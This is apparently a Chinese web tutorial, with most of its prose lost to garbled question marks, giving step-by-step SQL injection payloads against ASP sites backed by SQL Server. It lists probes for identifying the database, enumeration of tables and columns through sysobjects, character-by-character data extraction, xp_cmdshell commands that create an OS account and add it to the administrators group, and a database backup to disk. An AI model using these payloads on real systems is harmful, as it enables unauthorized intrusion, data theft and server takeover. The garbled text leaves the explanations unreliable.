ASP+SQL Server SQL ?????????????
???????????? ???????[ 2013/12/6 13:50:19 ] ????????
SQL????????????? |
??? |
Night--
Night’ and 1=1-- |
?ж???????????????SQL Server?е??????????”--” |
URL;and user>0-- |
User ??SQL Server????????????????????????????????????????????nvarchar????????????????????????????????nvarchar????nvarchar??????int????????????????SQL Server???????????????????????user???????nvarchar?“XXX”????????????int??????????????? |
URL;and db_name()>0-- |
???????????? |
URL;and (select count(*) from sysobjects)>0—
|
msysobjects??Access ???????????sysobjects??SQL Server???????????????ι????????????????????????б??????????????????????. |
URL;and (select count(*) from msysobjects)>0-- |
|
Night’ and (select count(*) from sysobjects where Xtype=’u’ and status>0)=??????-- |
????????????ж?????????????????sysobjects?д??????????????б??????????????????xtype=’U’ and status>0 ???????????????????? |
Night’ and (select top 1 name from sysobjects where Xtype=’U’ and status>0 )>0-- |
?????????????? |
Night’ and (select top 1 name from sysobjects where Xtype=’U’ and status>0 and name!=’?????????’)>0-- |
???????????????????????? |
Night’ and (Select Top lcol_name(object_id(‘????’)??1) from sysobjects)>0-- |
???sysobjects??????? |
Night’ and (select top 1 len(????) from ????)>0-- |
??????????? |
Night’ and (select top 1 asc(mid(??????1??1)) from ????)>0-- |
??????????????????????????????б????????? |
URL;exec master..xp_cmdshell “net user ???????????” /add |
????洢????xp_cmdshell??????????????????? |
URL;exec master..xp_cmdshell “net localgroup administrators ????? /add”-- |
??????????????????? |
URL;backup database ??????? to disk=’·??’;-- |
????洢????????????????????HTTP??????????£???????????????????????? |
??????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11